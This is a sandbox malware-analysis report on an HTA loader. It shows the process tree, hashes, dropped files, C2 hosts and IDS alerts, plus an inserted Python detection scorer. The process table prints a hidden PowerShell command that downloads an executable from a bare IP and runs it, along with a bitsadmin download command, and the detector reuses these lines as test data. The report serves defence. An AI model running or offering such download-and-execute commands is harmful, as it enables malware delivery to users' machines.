File name: jnn.hta

Full analysis: https://app.any.run/tasks/eb48ca2b-468e-4722-9e40-5b04796f96ff
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: March 14, 2019, 11:27:22
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: loader, opendir, autoit
Indicators:
MIME: text/html
File info: HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
MD5: A6D6CDC59C6507424B2AEDEFF46AFD2B
SHA1: 3D9D1169A822D2C17BA8E8F1E42794246AEA8958
SHA256: BD6B52E1365E898CF42A2AE281E897884C440BD33140A264F90E34D4AAE3330A
SSDEEP: 48:ZKpON1CTY1zH1aKL2slzhapoeddogoioFxBZoWk0uynk3nKpON1CTY1zH1aKL2s2:ZBvaY1zUMdzBZweoBvaY1zUMdzBZwjP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses BITSADMIN.EXE for downloading application

      • mshta.exe (PID: 3484)
    • Executes PowerShell scripts

      • mshta.exe (PID: 3484)
    • Application was dropped or rewritten from another process

      • Hmmmm.exe (PID: 3144)
      • mdo.exe (PID: 2740)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3036)
    • Downloads executable files from IP

      • powershell.exe (PID: 3036)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3036)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3036)
      • Hmmmm.exe (PID: 3144)
    • Drop AutoIt3 executable file

      • Hmmmm.exe (PID: 3144)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 3484)
    • Dropped object may contain Bitcoin addresses

      • Hmmmm.exe (PID: 3144)
      • mdo.exe (PID: 2740)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD: .txt | Text - UTF-8 encoded (100)
EXIF (HTML): ContentType: text/html; charset=utf-8
All screenshots are available in the full report
Total processes: 36
Monitored processes: 5
Malicious processes: 1
Suspicious processes: 1

Behavior graph (process tree recovered from the Process information table; the interactive graph is in the full report)

explorer.exe
  start -> mshta.exe (PID 3484, no specs)
    mshta.exe -> bitsadmin.exe (PID 2604, no specs)
    mshta.exe -> powershell.exe (PID 3036)
      drop and start -> Hmmmm.exe (PID 3144)
        drop and start -> mdo.exe (PID 2740, no specs)

Process information

PID 3484
  CMD: "C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\jnn.hta"
  Path: C:\Windows\System32\mshta.exe
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Microsoft (R) HTML Application host
  Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 2604
  CMD: "C:\Windows\System32\bitsadmin.exe" /transfer myFile /download /priority normal Your Binded File Direct URL C:\Users\admin\AppData\Local\Temp\text.rtf
  Path: C:\Windows\System32\bitsadmin.exe
  Parent process: mshta.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: BITS administration utility
  Exit code: 2147942487 (0x80070057, E_INVALIDARG)
  Version: 7.5.7600.16385 (win7_rtm.090713-1255)
  Note: the remote-URL argument is still an unfilled placeholder ("Your Binded File Direct URL") rather than an address, so BITS rejected the job: text.rtf is not among the dropped files, and the only downloads in this run come from powershell.exe.

PID 3036
  CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://141.136.44.78/jnn/jnn.exe','C:\Users\admin\AppData\Local\Temp\Hmmmm.exe');Start-Process C:\Users\admin\AppData\Local\Temp\Hmmmm.exe;
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: mshta.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows PowerShell
  Exit code: 0
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3144
  CMD: "C:\Users\admin\AppData\Local\Temp\Hmmmm.exe"
  Path: C:\Users\admin\AppData\Local\Temp\Hmmmm.exe
  Parent process: powershell.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0

PID 2740
  CMD: "C:\Users\admin\AppData\Local\Temp\88127361\mdo.exe" seg=muu
  Path: C:\Users\admin\AppData\Local\Temp\88127361\mdo.exe
  Parent process: Hmmmm.exe
  User: admin
  Company: AutoIt Team
  Integrity Level: MEDIUM
  Description: AutoIt v3 Script
  Version: 3, 3, 14, 5
  Note: mdo.exe carries the AutoIt Team version resource (it is the AutoIt3 interpreter), and its argument seg=muu is the name of a text file dropped by Hmmmm.exe into the same 88127361 directory, so this process is the interpreter running a dropped AutoIt script.
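The process table above is the kind of record an EDR writes for every process start. As an added example (not part of the ANY.RUN report and not any vendor's detection content), the following Python scores such records against the behaviours this chain exhibits: mshta.exe running an .hta from %TEMP%, mshta.exe spawning bitsadmin.exe or powershell.exe, a download cradle combined with hidden-window and execution-policy-bypass flags, a URL that addresses the server by bare IP (the same condition the ET "dotted-quad" alerts further down key on), and binaries executing out of %TEMP%. The event records are constructed from the command lines in the table plus one benign control; the record schema, the regexes and the score thresholds are assumptions, not a published rule.

```python
import re
from dataclasses import dataclass

# Record schema is an assumption (not a specific EDR's format); the report shows
# only the parent's image name, so parent_image is a basename.
@dataclass
class ProcEvent:
    pid: int
    parent_image: str
    image: str       # full path of the started process
    cmdline: str

# Constructed from the Process information table above, plus one benign control.
EVENTS = [
    ProcEvent(3484, "explorer.exe", r"C:\Windows\System32\mshta.exe",
              r'"C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\jnn.hta"'),
    ProcEvent(2604, "mshta.exe", r"C:\Windows\System32\bitsadmin.exe",
              r'"C:\Windows\System32\bitsadmin.exe" /transfer myFile /download /priority normal '
              r"Your Binded File Direct URL C:\Users\admin\AppData\Local\Temp\text.rtf"),
    ProcEvent(3036, "mshta.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass '
              r"-noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile("
              r"'http://141.136.44.78/jnn/jnn.exe','C:\Users\admin\AppData\Local\Temp\Hmmmm.exe');"
              r"Start-Process C:\Users\admin\AppData\Local\Temp\Hmmmm.exe;"),
    ProcEvent(3144, "powershell.exe", r"C:\Users\admin\AppData\Local\Temp\Hmmmm.exe",
              r'"C:\Users\admin\AppData\Local\Temp\Hmmmm.exe"'),
    ProcEvent(2740, "Hmmmm.exe", r"C:\Users\admin\AppData\Local\Temp\88127361\mdo.exe",
              r'"C:\Users\admin\AppData\Local\Temp\88127361\mdo.exe" seg=muu'),
    # Benign control (constructed): an operator running a cmdlet from a console.
    ProcEvent(4100, "cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile Get-Service"),
]

SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
LOLBIN_CHILDREN = {"powershell.exe", "bitsadmin.exe", "cmd.exe", "certutil.exe",
                   "rundll32.exe", "regsvr32.exe"}

DOWNLOAD_CRADLE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|Start-BitsTransfer|\biwr\b|/transfer\b", re.I)
# -NoProfile alone is common in legitimate automation, so it is deliberately not matched.
STEALTH_FLAGS = re.compile(
    r"-WindowStyle\s+Hidden|-w\s+hidden|-ExecutionPolicy\s+bypass|-ep\s+bypass|-enc(?:odedcommand)?\b",
    re.I)
URL_RE = re.compile(r"https?://[^\s'\";]+", re.I)
DOTTED_QUAD = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?=[/:])", re.I)
TEMP_EXE = re.compile(r"[A-Za-z]:\\[^\s\"';]*\\Temp\\[^\s\"';]*\.exe", re.I)
TEMP_HTA = re.compile(r"\\Temp\\[^\s\"']+\.hta", re.I)


def score_event(ev):
    """Return (score, reasons); each matched behaviour adds one point."""
    reasons = []
    child = ev.image.rsplit("\\", 1)[-1].lower()
    parent = ev.parent_image.lower()
    if child == "mshta.exe" and TEMP_HTA.search(ev.cmdline):
        reasons.append("mshta.exe runs an .hta from %TEMP%")
    if parent == "mshta.exe" and child in LOLBIN_CHILDREN:
        reasons.append(f"mshta.exe spawned {child}")
    if DOWNLOAD_CRADLE.search(ev.cmdline):
        reasons.append("download cradle in command line")
    if STEALTH_FLAGS.search(ev.cmdline):
        reasons.append("hidden window / execution-policy bypass / encoded command")
    if DOTTED_QUAD.search(ev.cmdline):
        reasons.append("URL addresses the server by bare IP")
    if TEMP_EXE.search(ev.image):
        reasons.append("image executes from %TEMP%")
        if parent in SCRIPT_HOSTS:
            reasons.append(f"%TEMP% binary launched by {parent}")
    return len(reasons), reasons


def verdict(score):
    # Thresholds are an assumption: one weak signal alone stays "suspicious".
    return "malicious" if score >= 2 else "suspicious" if score == 1 else "clean"


def analyze(events):
    """Map each event to (pid, verdict, reasons)."""
    results = []
    for ev in events:
        score, reasons = score_event(ev)
        results.append((ev.pid, verdict(score), reasons))
    return results


def extract_iocs(events):
    """Pull URLs, bare IPs and %TEMP% executables out of command lines and image paths."""
    urls, exes = set(), set()
    for ev in events:
        urls.update(URL_RE.findall(ev.cmdline))
        exes.update(TEMP_EXE.findall(ev.cmdline))
        exes.update(TEMP_EXE.findall(ev.image))
    ips = {m.group(1) for m in map(DOTTED_QUAD.match, urls) if m}
    return {"urls": urls, "ips": ips, "temp_executables": exes}


if __name__ == "__main__":
    for pid, v, reasons in analyze(EVENTS):
        print(f"PID {pid}: {v} - {'; '.join(reasons) or 'no findings'}")
    print(extract_iocs(EVENTS))
```

Run as-is, the scorer rates the powershell.exe, bitsadmin.exe and Hmmmm.exe starts malicious, the mshta.exe and mdo.exe starts suspicious, and the console control clean; extract_iocs recovers the download URL, the bare IP and the two %TEMP% executables without any network capture. The scoring is additive so that no single regex has to be precise; tune the thresholds and SCRIPT_HOSTS set against your own baseline before deploying anything like it.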
Total events: 1 026
Read events: 947
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 2
Suspicious files: 2
Text files: 54
Unknown types: 0

Dropped files

PID 3036, powershell.exe
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1RONFJ4LCO6QOWSVIXYO.temp
  MD5:
  SHA256:

PID 3036, powershell.exe
  C:\Users\admin\AppData\Local\Temp\Hmmmm.exe
  Type: executable
  MD5: 22CF84A2FD381A3E383E65C933553FE1
  SHA256: F62A182A1B4BD3F05AD0A639B3C5333990A6721DAE6715CA6863E5E97D03A6E8

PID 3484, mshta.exe
  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\error[1]
  Type: text
  MD5: 35FE91C2AC1BA0913CC617622B9EB43F
  SHA256: 966240C0527B20E8E2553B7E5A68594AE69230AA00186F2C6C2C342405494837

PID 3144, Hmmmm.exe
  C:\Users\admin\AppData\Local\Temp\88127361\bum.pdf
  Type: text
  MD5: FEAEEA7208F7A411E4CDC0E3286A11DB
  SHA256: 1DF03709F122F14E2606E94BCCB74B47C6C48A483C68A45ED446C06C0CA01965

PID 3036, powershell.exe
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Type: binary
  MD5: 0586DB8FF5249AD980CEC7BF2CBC3708
  SHA256: DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2

PID 3144, Hmmmm.exe
  C:\Users\admin\AppData\Local\Temp\88127361\nkq.docx
  Type: text
  MD5: 51C9B23E003E3E14F4659BC60D4BE131
  SHA256: 3ADC7F290017EB28AA34E8CEC227E781E25D180C3EB77E03B01211369980E0B6

PID 3484, mshta.exe
  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\error[1]
  Type: html
  MD5: 16AA7C3BEBF9C1B84C9EE07666E3207F
  SHA256: 7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754

PID 3036, powershell.exe
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1add71.TMP
  Type: binary
  MD5: 0586DB8FF5249AD980CEC7BF2CBC3708
  SHA256: DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2

PID 3144, Hmmmm.exe
  C:\Users\admin\AppData\Local\Temp\88127361\seg=muu
  Type: text
  MD5: 451111D03BCA3331E4D1F2631F56C494
  SHA256: 98EC9A9A42575A0626EBFFAF344487E26118EBCA0D837D218CFC4DC446F37102

PID 3144, Hmmmm.exe
  C:\Users\admin\AppData\Local\Temp\88127361\lpr.mp4
  Type: text
  MD5: 3576B5978B68394D98E25AFFD7225B83
  SHA256: E182A17F5A6B486FF9410ECCCBF9685BC5C54CF2EC314AE255040DABCE04E895
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 2
TCP/UDP connections: 18
DNS requests: 17
Threats: 0

HTTP requests

PID 3036, powershell.exe
  GET 200 141.136.44.78:80 http://141.136.44.78/jnn/jnn.exe
  CN: LT | Type: executable | Size: 905 Kb | Reputation: suspicious

Process not recorded
  GET 200 141.136.44.78:80 http://141.136.44.78/jnn/jnn.exe
  CN: LT | Type: executable | Size: 905 Kb | Reputation: suspicious

Connections

Process not recorded
  8.8.4.4:53 | Google Inc. | US | whitelisted
  141.136.44.78:80 | Vardas.lt, Uab | LT | suspicious
  185.163.45.48:58887 | kgentle77.duckdns.org | MivoCloud SRL | MD | suspicious

PID 3036, powershell.exe
  141.136.44.78:80 | Vardas.lt, Uab | LT | suspicious
  8.8.8.8:53 | Google Inc. | US | whitelisted

DNS requests

kgentle777.hopto.org | (no answer recorded) | unknown
kgentle77.duckdns.org | 185.163.45.48 | malicious

Threats

PID 3036, powershell.exe
  A Network Trojan was detected: ET INFO Executable Download from dotted-quad Host
  Potentially Bad Traffic: ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
  Potential Corporate Privacy Violation: ET POLICY PE EXE or DLL Windows file download HTTP
  Potentially Bad Traffic: ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
  Potentially Bad Traffic: ET INFO SUSPICIOUS Dotted Quad Host MZ Response

Process not recorded
  A Network Trojan was detected: ET INFO Executable Download from dotted-quad Host
  Potentially Bad Traffic: ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
  Potential Corporate Privacy Violation: ET POLICY PE EXE or DLL Windows file download HTTP
  Potentially Bad Traffic: ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
  Potentially Bad Traffic: ET INFO SUSPICIOUS Dotted Quad Host MZ Response
No debug info